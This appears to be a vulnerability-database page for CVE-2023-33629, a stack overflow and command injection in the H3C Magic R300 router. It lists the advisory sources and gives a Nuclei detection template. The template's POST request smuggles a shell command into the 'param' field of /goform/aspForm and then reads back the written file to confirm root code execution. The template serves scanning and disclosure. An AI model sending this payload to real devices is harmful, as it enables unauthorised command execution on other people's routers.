| Reporter | Title | Published | Views |
|---|---|---|---|
| attackerkb | CVE-2023-33629 | 31 May 2023 21:15 | – |
| circl | CVE-2023-33629 | 17 Nov 2023 09:27 | – |
| cnnvd | H3C Magic R300-2100M Buffer Error Vulnerability | 31 May 2023 00:00 | – |
| cnvd | H3C Magic R300 Stack Overflow Vulnerability (CNVD-2023-52054) | 5 Jun 2023 00:00 | – |
| cve | CVE-2023-33629 | 31 May 2023 00:00 | – |
| cvelist | CVE-2023-33629 | 31 May 2023 00:00 | – |
| nvd | CVE-2023-33629 | 31 May 2023 21:15 | – |
| osv | CVE-2023-33629 | 31 May 2023 21:15 | – |
| prion | Stack overflow | 31 May 2023 21:15 | – |
| ptsecurity | PT-2023-24414 · H3C · H3C Magic R300 | 31 May 2023 00:00 | – |

```yaml
id: CVE-2023-33629

info:
  name: H3C Magic R300-2100M - Remote Code Execution
  author: DhiyaneshDK
  severity: high
  description: |
    H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.
  impact: |
    Authenticated high-privilege attackers can exploit stack overflow through command injection in the DelL2tpLNSList parameter to execute arbitrary commands on the H3C Magic R300 router with root privileges.
  remediation: |
    Update H3C Magic R300-2100M firmware to a version newer than R300-2100MV100R004 that properly validates input in the DeltriggerList interface at /goform/aspForm.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33629
    - https://hackmd.io/@0dayResearch/r1UjggZfh
    - https://hackmd.io/%400dayResearch/r1UjggZfh
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-33629
    cwe-id: CWE-787
    epss-score: 0.04353
    epss-percentile: 0.90052
    cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: h3c
    product: magic_r300-2100m_firmware
    fofa-query:
      - app="H3C-Ent-Router"
      - app="h3c-ent-router"
  tags: cve2023,cve,router,rce,h3c,vkev,vuln

variables:
  filename: "{{to_lower(rand_text_alpha(7))}}"

http:
  - raw:
      - |
        POST /goform/aspForm HTTP/1.1
        Host: {{Hostname}}

        CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/{{filename}});
      - |
        GET /{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 302
          - contains(body_1, 'do_cmd.asp')
          - status_code_2 == 200
          - contains_all(body_2, 'www', 'www_multi')
        condition: and
# digest: 490a0046304402200f506d000769ece791fe22a13fa1ad467a936f9f2730ed091e9e60bb22f20c15022065eba5d519e09985615a1cde1de65fe8ba871bfe3e70f20190fd98cf1b670d8a:922c64590222798bb761d5b6d8e72950
```